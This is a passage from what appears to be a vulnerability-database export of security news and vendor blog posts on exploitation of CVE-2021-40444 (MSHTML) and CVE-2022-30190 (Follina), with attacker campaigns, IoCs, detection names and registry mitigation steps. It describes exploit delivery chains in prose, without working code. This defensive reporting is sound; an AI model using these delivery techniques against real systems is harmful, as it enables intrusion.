\u201cExecuting this script leads to spawning PowerShell to download a CobaltStrike beacon from the remote server and execute it on the victim\u2019s machine.\u201d\n\n## **Potentially CarbonSpider at Work?**\n\nResearchers are unsure who is behind the campaign but noted the similarity of the lure to one used before and linked to the threat group [CarbonSpider](<https://prod.adversary.crowdstrike.cloud.jam3.net/en-US/adversary/carbon-spider/>), which in the past has targeted Russian financial institutions.\n\nA previous CarbonSpider campaign also used an email template claiming to be from the Federal Service for Supervision of Communications, Information Technology and Mass Communications as a lure, according to the post. In that campaign, the threat actor deployed a PowerShell-based remote-access trojan (RAT) in an obfuscated PowerShell script that used a combination of Base64 and custom obfuscation, according to the post.\n\nHidden inside the script was a RAT that could move the attack to the next stage and execute various payloads, including JavaScript, PowerShell, an executable or a DLL.\n\n\u201cThis RAT starts its activity by setting up some configurations which include the [command-and-control, or C2] URL, intervals, debug mode and a parameter-named group that initialized with \u2018Madagascar\u2019 which probably is the alias of the threat actor,\u201d Jazi wrote.\n\nBased on MalwareBytes\u2019 observations of the domains targeted in the campaign, potential victims are from a number of regional and federal government organizations, including: the authorities of the Chuvash Republic Official internet portal; the Russian Ministry of Internal Affairs; the Ministry of Education and Science of the Republic of Altai; the Ministry of Education of the Stavropol Territory; the Minister of Education and Science of the Republic of North Ossetia-Alania; and the Ministry of Science and Higher Education of the Russian Federation.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-30T13:13:49", "type": "threatpost", "title": "MSHTML Flaw Exploited to Attack Russian Dissidents", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444", "CVE-2021-44228"], "modified": "2022-03-30T13:13:49", "id": "THREATPOST:A98C64CB9BDDE55F51C984B749753904", "href": "https://threatpost.com/mshtml-flaw-exploited-to-attack-russian-dissidents/179150/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-18T14:56:17", "description": "Google\u2019s Threat Analysis Group (TAG) has provided a rare look inside the operations of a cybercriminal dubbed \u201cExotic Lily,\u201d that appears to 
serve as an initial-access broker for both Conti and Diavol ransomware gangs.\n\nResearchers\u2019 analysis exposes the business-like approach the group takes to brokering initial access into organizations\u2019 networks through a range of tactics so its partners can engage in further malicious activity.\n\nWhile ransomware actors tend to get most of the attention, they can\u2019t do their dirty work without first gaining access to an organization\u2019s network. This is often the job of what are called initial-access brokers (IABs), or \u201cthe opportunistic locksmiths of the security world,\u201d as Google TAG calls them in [a blog post](<https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/>) published Thursday.\n\n\u201cIt\u2019s a full-time job,\u201d Google TAG researchers Vlad Stolyarov and Benoit Sevens wrote in the post. \u201cThese groups specialize in breaching a target in order to open the doors \u2014 or the Windows \u2014 to the malicious actor with the highest bid.\u201d\n\nGoogle TAG first encountered Exotic Lily last September, when the group was doing just that \u2014 exploiting the [zero-day Microsoft flaw](<https://threatpost.com/microsoft-mshtml-ryuk-ransomware/174780/>) in MSHTML ([CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>)) as part of what turned out to be a full-time IAB business \u201cclosely linked with data exfiltration and deployment of human-operated ransomware such as Conti and Diavol,\u201d researchers wrote.\n\nAt the peak of the group\u2019s activity, Exotic Lily \u2014 which researchers believe is working with the Russian cybercrime gang known as FIN12, [Wizard Spider](<https://threatpost.com/wizard-spider-upgrades-ryuk-ransomware/149853/>) or DEV-0413 \u2014 was sending more than 5,000 emails a day to as many as 650 targeted organizations globally, they said.\n\n\u201cUp until November 2021, the group seemed to be targeting specific industries such as IT, 
cybersecurity and healthcare, but as of late we have seen them attacking a wide variety of organizations and industries, with less specific focus,” researchers wrote in the post.

## **Soup to Nuts**

Exotic Lily works ostensibly as a full-time cybercrime business, which might be described as a “soup to nuts” organization if it were actually a legitimate company.

The group has maintained a “relatively consistent attack chain” during the time it was being tracked by researchers, with its operators “working a fairly typical 9-to-5 job, with very little activity during the weekends,” researchers wrote. Working hours indicated that the group is likely operating out of a Central or Eastern European time zone.

The group’s tactics include initial activity to build fake online personas—including social-media profiles with AI-generated photos—that spoof both identities and company domains to ensure it appears as an authentic entity to its targets when carrying out phishing, researchers revealed.

In fact, in November, Google TAG observed the group impersonating real company employees by copying their personal data from social media and business databases such as RocketReach and CrunchBase.

“In the majority of cases, a spoofed domain name was identical to a real domain name of an existing organization, with the only difference being a change of TLD to “.us”, “.co” or “.biz,” researchers wrote.

## **Full-Time Phishing Business**

While bug exploitation is part of its work as noted, Exotic Lily’s main business operation is to use these spoofed email accounts to send [spear-phishing](<https://threatpost.com/spear-phishing-exploits-glitch-steal-credentials/176449/>) emails. They often purport to be a business proposal, such as seeking to outsource a software-development project or an information-security service.

One unique aspect of the group’s method is to engage in more follow-up communications with targets than most cybercriminals behind phishing campaigns typically do, researchers observed. This activity includes operators attempting to schedule a meeting to discuss a project’s design or requirements, or engaging in other communication to gain affinity and trust, they said.

In its final attack stage, Exotic Lily uploads the ultimate payload to a public file-sharing service such as TransferNow, TransferXL, WeTransfer or OneDrive, and then uses a built-in email notification feature to share the file with the target.

This tactic helps the group evade detection, as the final email originates from the email address of a legitimate file-sharing service and not the attacker’s email, researchers noted.

## **Payload Delivery**

Typically, the actors upload another group’s malware to the file-sharing service prior to sharing it with the target, researchers said. While some samples of malware appear custom, Google TAG doesn’t think it’s Exotic Lily who’s developing these binaries.

Though their first observation of the group was the use of documents exploiting the MSHTML bug, researchers later observed Exotic Lily changing its delivery tactics to use ISO archives that include shortcuts to the [BazarLoader dropper](<https://threatpost.com/bazarloader-malware-slack-basecamp/165455/>), according to the post.

This month, Google observed the group delivering ISO files with a custom loader that drops malware dubbed Bumblebee, which uses Windows Management Instrumentation (WMI) to collect various system details such as OS version, username and domain name. These details are then exfiltrated in JSON format to a command-and-control (C2) server, researchers said.

Bumblebee also can execute commands and code from the C2, and in recent activity was seen fetching Cobalt Strike payloads to be executed on targeted systems, they added.
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-18T14:49:01", "type": "threatpost", "title": "Google Blows Lid Off Conti, Diavol Ransomware Access-Broker Ops", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444", "CVE-2021-44228"], "modified": "2022-03-18T14:49:01", "id": "THREATPOST:B2FEDF3EA50507F526C77105093E8977", "href": 
"https://threatpost.com/google-conti-diavol-ransomware-access-broker/178981/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2022-06-08T07:56:31", "description": "

At the end of May, researchers from the nao_sec team [reported](<https://twitter.com/nao_sec/status/1530196847679401984>) a new zero-day vulnerability in Microsoft Support Diagnostic Tool (MSDT) that can be exploited using Microsoft Office documents. It allowed attackers to execute code remotely on Windows systems even if the victim never opened the document containing the exploit, or opened it in Protected Mode. The vulnerability, which the researchers dubbed Follina, later received the identifier [CVE-2022-30190](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190>).

## CVE-2022-30190 technical details

Briefly, the exploitation of the CVE-2022-30190 vulnerability can be described as follows. The attacker creates an MS Office document with a link to an external malicious OLE object (declared in _**word/_rels/document.xml.rels**_), such as an HTML file located on a remote server. The link is described by a tag in that file with the attributes _**Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject", Target="http_malicious_link!"**_. The link in the **Target** attribute points to the above-mentioned HTML file, inside which a malicious script is written using a special URI scheme.  
When opened, the attacker-created document runs MSDT. The attacker can then pass, through a set of parameters, any command to this tool for execution on the victim's system with the privileges of the user who opened the document. What is more, the command can be passed even if the document is opened in Protected Mode and macros are disabled.  
At the time of posting, two document formats were known to allow CVE-2022-30190 exploitation: Microsoft Word (.docx) and Rich Text Format (.rtf). The latter is more dangerous for the potential victim because it allows execution of a malicious command even without opening the document — just previewing it in Windows Explorer is enough.

## Protecting against Follina

Kaspersky is aware of attempts to exploit the CVE-2022-30190 vulnerability through Microsoft Office documents. Our solutions protect against this using the [Behavior Detection](<https://www.kaspersky.com/enterprise-security/wiki-section/products/behavior-based-protection>) and [Exploit Prevention](<https://www.kaspersky.com/enterprise-security/wiki-section/products/exploit-prevention>) tools.  
The following verdict names are possible:

 * PDM:Exploit.Win32.Generic
 * HEUR:Exploit.MSOffice.Agent.n
 * HEUR:Exploit.MSOffice.Agent.gen
 * HEUR:Exploit.MSOffice.CVE-2017-0199.a
 * HEUR:Exploit.MSOffice.CVE-2021-40444.a
 * HEUR:Exploit.MSOffice.Generic

_Geography of Follina exploitation attempts with Exploit.MSOffice.CVE-2021-40444.a verdict, May 1 – June 3, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/08064948/01-en-cve-2022-30190.png>))_

We expect to see more Follina exploitation attempts to gain access to corporate resources, including for ransomware attacks and data breaches. Therefore, we continue to closely monitor the situation and improve overall vulnerability detection. In addition, as part of the [Managed Detection and Response](<https://www.kaspersky.com/enterprise-security/managed-detection-and-response>) service, our SOC experts can detect vulnerability exploitation, investigate attacks and provide clients with all necessary threat-related information.  
To protect against Follina exploitation, we strongly advise that you follow Microsoft's own guidelines: [Guidance for CVE-2022-30190 Microsoft Support Diagnostic Tool Vulnerability](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>). In particular, to prevent exploitation of this vulnerability, you can disable support for the MSDT URL protocol by taking these steps:

 1. Run Command Prompt as Administrator.
 2. To back up the registry key, execute the command "reg export HKEY_CLASSES_ROOT\ms-msdt filename".
 3. Execute the command "reg delete HKEY_CLASSES_ROOT\ms-msdt /f".
", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-06T08:00:02", "type": "securelist", "title": "CVE-2022-30190 (Follina) vulnerability in MSDT: description and counteraction", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199", "CVE-2021-40444", "CVE-2022-30190"], "modified": "2022-06-06T08:00:02", "id": "SECURELIST:29152837444B2A7E5A9B9FCB107DAB36", "href": "https://securelist.com/cve-2022-30190-follina-vulnerability-in-msdt-description-and-counteraction/106703/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-25T08:35:29", "description": "

## Summary

Last week, Microsoft reported the remote code execution vulnerability CVE-2021-40444 in the MSHTML browser engine.
According to the company, this vulnerability has already been used in targeted attacks against Microsoft Office users. In an attempt to exploit this vulnerability, attackers create a document with a specially crafted object. If a user opens the document, MS Office will download and execute a malicious script.  
According to our data, the same attacks are still happening all over the world. We are currently seeing attempts to exploit the CVE-2021-40444 vulnerability targeting companies in the research and development sector, the energy sector and large industrial sectors, banking and medical technology development sectors, as well as telecommunications and the IT sector. Due to its ease of exploitation and the few published [Proof-of-Concept](<https://encyclopedia.kaspersky.com/glossary/poc-proof-of-concept/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) (PoC) exploits, we expect to see an increase in attacks using this vulnerability.

_Geography of CVE-2021-40444 exploitation attempts_

Kaspersky is aware of targeted attacks using CVE-2021-40444, and our products protect against attacks leveraging the vulnerability. Possible detection names are:

 * HEUR:Exploit.MSOffice.CVE-2021-40444.a
 * HEUR:Trojan.MSOffice.Agent.gen
 * PDM:Exploit.Win32.Generic

_Killchain generated by KEDR during execution of CVE-2021-40444 Proof-of-Concept_

Experts at Kaspersky are monitoring the situation closely and improving mechanisms to detect this vulnerability using [Behavior Detection](<https://www.kaspersky.com/enterprise-security/wiki-section/products/behavior-based-protection>) and [Exploit Prevention](<https://www.kaspersky.com/enterprise-security/wiki-section/products/exploit-prevention>) components. Within our [Managed Detection and Response](<https://www.kaspersky.com/enterprise-security/managed-detection-and-response>) service, our SOC experts are able to detect when this vulnerability is exploited, investigate such attacks and notify customers.

## Technical details

The remote code execution vulnerability CVE-2021-40444 was found in MSHTML, the Internet Explorer browser engine, which is a component of modern Windows systems, both client and server editions. Moreover, the engine is often used by other programs to work with web content (e.g. MS Word or MS PowerPoint).  
In order to exploit the vulnerability, attackers embed a special object in a Microsoft Office document containing a URL for a malicious script. If a victim opens the document, Microsoft Office will download the malicious script from the URL and run it using the MSHTML engine. Then the script can use ActiveX controls to perform malicious actions on the victim's computer. For example, the original zero-day exploit which was used in targeted attacks at the time of detection used ActiveX controls to download and execute a Cobalt Strike payload. We are currently seeing various types of malware, mostly backdoors, which are delivered by exploiting the CVE-2021-40444 vulnerability.

## Mitigations

 * Follow [Microsoft security update guidelines](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>).
 * Use the latest [Threat Intelligence information](<https://www.kaspersky.com/enterprise-security/threat-intelligence>) to keep up to date with TTPs used by threat actors.
 * Businesses should use a security solution that provides vulnerability, patch management and exploit prevention components, such as the [Automatic Exploit Prevention](<https://www.kaspersky.com/enterprise-security/wiki-section/products/exploit-prevention>) component in Kaspersky Endpoint Security for Business. The component monitors suspicious actions in applications and blocks malicious file execution.
 * Use solutions like [Kaspersky Endpoint Detection and Response](<https://www.kaspersky.com/enterprise-security/endpoint-detection-response-edr>) and the [Kaspersky Managed Detection and Response](<https://www.kaspersky.com/enterprise-security/managed-detection-and-response>) service, which help identify and stop an attack at an early stage before the attackers achieve their final goal.

## IoC

**MD5**  
[ef32824c7388a848c263deb4c360fd64](<https://opentip.kaspersky.com/ef32824c7388a848c263deb4c360fd64/?utm_source=SL&utm_medium=SL&utm_campaign=SL>)  
[e58b75e1f588508de7c15a35e2553b86](<https://opentip.kaspersky.com/e58b75e1f588508de7c15a35e2553b86/?utm_source=SL&utm_medium=SL&utm_campaign=SL>)  
[e89dbc1097cfb8591430ff93d9952260](<https://opentip.kaspersky.com/e89dbc1097cfb8591430ff93d9952260/?utm_source=SL&utm_medium=SL&utm_campaign=SL>)

**URL**  
[hidusi[.]com](<https://opentip.kaspersky.com/hidusi.com/?utm_source=SL&utm_medium=SL&utm_campaign=SL>)  
[103.231.14[.]134](<https://opentip.kaspersky.com/103.231.14.134/?utm_source=SL&utm_medium=SL&utm_campaign=SL>)
", "cvss3": {}, "published": "2021-09-16T15:30:57", "type": "securelist", "title": "Exploitation of the CVE-2021-40444 vulnerability in MSHTML", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-16T15:30:57", "id": "SECURELIST:63306FA6D056BD9A04969409AC790D84", "href": "https://securelist.com/exploitation-of-the-cve-2021-40444-vulnerability-in-mshtml/104218/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T14:36:44", "description": "

 * **IT threat evolution Q3 2021**
 * [IT threat evolution in Q3 2021. PC statistics](<https://securelist.com/it-threat-evolution-in-q3-2021-pc-statistics/104982/>)
 * [IT threat evolution in Q3 2021. Mobile statistics](<https://securelist.com/it-threat-evolution-in-q3-2021-mobile-statistics/105020/>)

## Targeted attacks

### WildPressure targets macOS

Last March, we reported a [WildPressure campaign targeting industrial-related entities in the Middle East](<https://securelist.com/wildpressure-targets-industrial-in-the-middle-east/96360/>). While tracking this threat actor in spring 2021, we discovered a newer version. It contains the C++ Milum Trojan, a corresponding VBScript variant and a set of modules that include an orchestrator and three plugins. This confirms our previous assumption that there were more last-stagers besides the C++ ones.

Another language used by WildPressure is Python. The PyInstaller module for Windows contains a script named "Guard". Interestingly, this malware was developed for both Windows and macOS operating systems. The coding style, overall design and C2 communication protocol are quite recognizable across all three programming languages used by the authors.

WildPressure used both virtual private servers (VPS) and compromised servers in its infrastructure, most of which were WordPress websites.

We have very limited visibility for the samples described in our report, but our telemetry suggests that the targets in this campaign were also from the oil and gas industry.

You can view our report on the new version [here](<https://securelist.com/wildpressure-targets-macos/103072/>), together with a video presentation of our findings.

### LuminousMoth: sweeping attacks for the chosen few

We recently uncovered a large-scale and highly active attack against targets in Southeast Asia by a threat actor that we call [LuminousMoth](<https://securelist.com/apt-luminousmoth/103332/>). The campaign dates back to October last year and was still ongoing at the time we published our public report in July. Most of the early sightings were in Myanmar, but it seems the threat actor is now much more active in the Philippines.
Targets include high-profile organizations: namely, government entities located both within those countries and abroad.

Most APT threats carefully select their targets and tailor the infection vectors, implants and payloads to the victims' identities or environment. It's not often we observe a large-scale attack by APT threat actors – they usually avoid such attacks because they are too 'noisy' and risk drawing attention to the campaign. LuminousMoth is an exception. We observed a high number of infections, although we think the campaign was aimed at a few targets of interest.

The attackers obtain initial access to a system by sending a spear-phishing email to the victim containing a Dropbox download link. The link leads to a RAR archive that masquerades as a Word document. The archive contains two malicious DLL libraries as well as two legitimate executables that side-load the DLL files. We found multiple archives like this with file names of government entities linked to Myanmar.

We also observed a second infection vector that comes into play after the first one has successfully finished. The malware tries to spread to other hosts on the network by infecting USB drives.

In addition to the malicious DLLs, the attackers also deployed a signed but fake version of the popular application Zoom on some infected systems, enabling them to exfiltrate data.

The threat actor also deploys an additional tool that accesses a victim's Gmail session by stealing cookies from the Chrome browser.

Infrastructure ties as well as shared TTPs allude to a possible connection between LuminousMoth and the HoneyMyte threat group, which has been seen targeting the same region using similar tools in the past.

### Targeted attacks exploiting CVE-2021-40444

On September 7, [Microsoft reported a zero-day vulnerability](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) (CVE-2021-40444) that could allow an attacker to execute code remotely on vulnerable computers. The vulnerability is in MSHTML, the Internet Explorer engine. Even though few people use IE nowadays, some programs use its engine to handle web content – in particular, Microsoft Office applications.

We [have seen targeted attacks](<https://securelist.com/exploitation-of-the-cve-2021-40444-vulnerability-in-mshtml/104218/>) exploiting the vulnerability to target companies in research and development, the energy sector and other major industries, banking, the medical technology sector, as well as telecoms and IT.

To exploit the vulnerability, attackers embed a special object in a Microsoft Office document containing a URL for a malicious script. If the victim opens the document, Microsoft Office downloads the script and runs it using the MSHTML engine. Then the script can use ActiveX controls to perform malicious actions on the victim's computer.

### Tomiris backdoor linked to SolarWinds attack

The SolarWinds incident last December stood out because of the extreme carefulness of the attackers and the high-profile nature of their victims. The evidence suggests that the threat actor behind the attack, DarkHalo (aka Nobelium), had spent six months inside OrionIT's networks to perfect their attack. The following timeline sums up the different steps of the campaign.

In June, more than six months after DarkHalo had gone dark, we observed the DNS hijacking of multiple government zones of a CIS member state that allowed the attacker to redirect traffic from government mail servers to computers under their control – probably achieved by obtaining credentials to the control panel of the victims' registrar. When victims tried to access their corporate mail, they were redirected to a fake copy of the web interface.

After this, they were tricked into downloading previously unknown malware. The backdoor, dubbed Tomiris, bears a number of similarities to the second-stage malware, Sunshuttle (aka GoldMax), used by DarkHalo last year. However, there are also a number of overlaps between Tomiris and Kazuar, a backdoor that has been linked to the Turla APT threat actor. None of the similarities is enough to link Tomiris and Sunshuttle with sufficient confidence. However, taken together they suggest the possibility of common authorship or shared development practices.

You can read our analysis [here](<https://securelist.com/darkhalo-after-solarwinds-the-tomiris-connection/104311/>).

### GhostEmperor

Earlier this year, while investigating the rise of attacks against Exchange servers, we noticed a recurring cluster of activity that appeared in several distinct compromised networks. We attribute the activity to a previously unknown threat actor that we have called [GhostEmperor](<https://securelist.com/ghostemperor-from-proxylogon-to-kernel-mode/104407/>). This cluster stood out because it used a formerly unknown Windows kernel mode rootkit that we dubbed Demodex, and a sophisticated multi-stage malware framework aimed at providing remote control over the attacked servers.

The rootkit is used to hide the user mode malware's artefacts from investigators and security solutions, while demonstrating an interesting loading scheme involving the kernel mode component of an open-source project named Cheat Engine to bypass the Windows Driver Signature Enforcement mechanism.

We identified multiple attack vectors that triggered an infection chain leading to the execution of the malware in memory. The majority of GhostEmperor infections were deployed on public-facing servers, as many of the malicious artefacts were installed by the httpd.exe Apache server process, the w3wp.exe IIS Windows server process, or the oc4j.jar Oracle server process.
This means that the attackers probably abused vulnerabilities in the web applications running on those systems, allowing them to drop and execute their files.

Although infections often start with a BAT file, in some cases the known infection chain was preceded by an earlier stage: a malicious DLL that was side-loaded by wdichost.exe, a legitimate Microsoft command line utility (originally called MpCmdRun.exe). The side-loaded DLL then proceeds to decode and load an additional executable called license.rtf. Unfortunately, we did not manage to retrieve this executable, but we saw that the consecutive actions of loading it included the creation and execution of GhostEmperor scripts by wdichost.exe.

This toolset was in use from as early as July 2020, mainly targeting Southeast Asian entities, including government agencies and telecoms companies.

### FinSpy: analysis of current capabilities

At the end of September, at the Kaspersky [Security Analyst Summit](<https://thesascon.com/>), our researchers provided an [overview of FinSpy](<https://securelist.com/finspy-unseen-findings/104322/>), an infamous surveillance toolset that several NGOs have repeatedly reported being used against journalists, political dissidents and human rights activists. Our analysis included not only the Windows version of FinSpy, but also Linux and macOS versions, which share the same internal structure and features.

After 2018, we observed falling detection rates for FinSpy for Windows. However, it never actually went away – it was simply using various first-stage implants to hide its activities. We started detecting some suspicious backdoored installer packages (including TeamViewer, VLC Media Player and WinRAR); then in the middle of 2019 we found a host that served these installers along with FinSpy Mobile implants for Android.

The authors have gone to great lengths to make FinSpy inaccessible to security researchers – it seems they have put as much work into anti-analysis and obfuscation as they have into the Trojan itself. First, the samples are protected with multiple layers of evasion tactics.

Moreover, once the Trojan has been installed, it is heavily camouflaged using four complex, custom-made obfuscators.

Apart from Trojanized installers, we also observed infections involving use of a UEFI (Unified Extensible Firmware Interface) and MBR (Master Boot Record) bootkit. While the MBR infection has been known since at least 2014, details on the UEFI bootkit were publicly revealed for the first time in our private report on FinSpy.

The user of a smartphone or tablet can be infected through a link in a text message. In some cases (for example, if the victim's iPhone has not been [jailbroken](<https://encyclopedia.kaspersky.com/glossary/jailbreak/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>)), the attacker may need physical access to the device.

## Other malware

### REvil attack on MSPs and their customers worldwide

An attack perpetrated by the REvil Ransomware-as-a-Service gang (aka Sodinokibi) targeting Managed Service Providers (MSPs) and their clients was discovered on July 2.

The attackers [identified and exploited](<https://threatpost.com/kaseya-patches-zero-day-exploits/167548/>) a zero-day vulnerability in the Kaseya Virtual System/Server Administrator (VSA) platform. The VSA software, used by Kaseya customers to remotely monitor and manage software and network infrastructure, is supplied either as a cloud service or via on-premises VSA servers.

The exploit involved deploying a malicious dropper via a PowerShell script. The script disabled Microsoft Defender features and then used the certutil.exe utility to decode a malicious executable (agent.exe) that dropped an older version of Microsoft Defender, along with the REvil ransomware packed into a malicious library. That library was then loaded by the legitimate MsMpEng.exe by utilizing the DLL side-loading technique.

The attack is estimated to have resulted in the encryption of files belonging to around 60 Kaseya customers using the on-premises version of the platform. Many of them were MSPs who use VSA to manage the networks of other businesses. This MSP connection gave REvil access to those businesses, and Kaseya estimated that [around 1,500 downstream businesses were affected](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689-Important-Notice-July-2nd-2021>).

Using our Threat Intelligence service, we observed more than 5,000 attack attempts in 22 countries by the time [our analysis of the attack](<https://securelist.com/revil-ransomware-attack-on-msp-companies/103075/>) was published.

### What a [Print]Nightmare

Early in July, Microsoft published an alert about vulnerabilities in the Windows Print Spooler service. The vulnerabilities, [CVE-2021-1675](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1675>) and [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34527>) (aka PrintNightmare), can be used by an attacker with a regular user account to take control of a vulnerable server or client machine that runs the Windows Print Spooler service. This service is enabled by default on all Windows clients and servers, including domain controllers, making both vulnerabilities potentially very dangerous.

Moreover, owing to a misunderstanding between teams of researchers, a [proof-of-concept](<https://encyclopedia.kaspersky.com/glossary/poc-proof-of-concept/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) (PoC) exploit for PrintNightmare was [published](<https://therecord.media/poc-released-for-dangerous-windows-printnightmare-bug/>) online. The researchers involved believed that Microsoft's Patch Tuesday release in June had already solved the problem, so they shared their work with the expert community. However, while Microsoft had published a patch for CVE-2021-1675, the PrintNightmare vulnerability remained unpatched until July. The PoC was quickly removed, but not before it had been copied multiple times.

CVE-2021-1675 is a [privilege elevation](<https://encyclopedia.kaspersky.com/glossary/privilege-escalation/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) vulnerability, allowing an attacker with low access privileges to craft and use a malicious DLL file to run an exploit and gain higher privileges.
However, that is only possible if the attacker already has direct access to the vulnerable computer in question.\n\nCVE-2021-34527 is significantly more dangerous because it is a [remote code execution](<https://encyclopedia.kaspersky.com/glossary/remote-code-execution-rce/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) (RCE) vulnerability, which means it allows remote injection of DLLs.\n\nYou can find a more detailed technical description of both vulnerabilities [here](<https://securelist.com/quick-look-at-cve-2021-1675-cve-2021-34527-aka-printnightmare/103123/>).\n\n### Grandoreiro and Melcoz arrests\n\nIn July, the Spanish Ministry of the Interior [announced](<http://www.interior.gob.es/prensa/noticias/-/asset_publisher/GHU8Ap6ztgsg/content/id/13552853>) the arrest of 16 people connected to the [Grandoreiro and Melcoz (aka Mekotio) cybercrime groups](<https://securelist.com/arrests-of-members-of-tetrade-seed-groups-grandoreiro-and-melcoz/103366/>). Both groups are originally from Brazil and form part of the [Tetrade umbrella](<https://securelist.com/the-tetrade-brazilian-banking-malware/97779/>), operating for a few years now in Latin America and Western Europe.\n\nThe Grandoreiro banking Trojan malware family initially started its operations in Brazil and then expanded its operations to other Latin American countries and then to Western Europe. The group has regularly improved its techniques; and, based on our analysis of the group's campaigns, it operates as a [malware-as-a-service (MaaS)](<https://encyclopedia.kaspersky.com/glossary/malware-as-a-service-maas/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) project. 
Our telemetry shows that, since January 2020, Grandoreiro has mainly attacked victims in Brazil, Mexico, Spain, Portugal and Turkey.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/07/14175031/tetrade_arrest_01.png>)\n\nMelcoz had been active in Brazil since at least 2018, before expanding overseas. We observed the group attacking assets in Chile in 2018 and, more recently, in Mexico: it's likely that there are victims in other countries too, as some of the targeted banks have international operations. As a rule, the malware uses AutoIt or VBS scripts, added into MSI files, which run malicious DLLs using the DLL-Hijack technique, aiming to bypass security solutions. The malware steals passwords from browsers and from the device's memory, providing remote access to capture internet banking access. It also includes a Bitcoin wallet stealing module. Our telemetry confirms that, since January 2020, Melcoz has been actively targeting Brazil, Chile and Spain, among other countries.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/07/14175038/tetrade_arrest_02.png>)\n\nSince both malware families are from Brazil, the individuals arrested in Spain are just operators. So, it's likely that the creators of Grandoreiro and Melcoz will continue to develop new malware techniques and recruit new members in their countries of interest.\n\n### Gamers beware\n\nEarlier this year, we discovered an ad in an underground forum for a piece of malware dubbed BloodyStealer by its creators. 
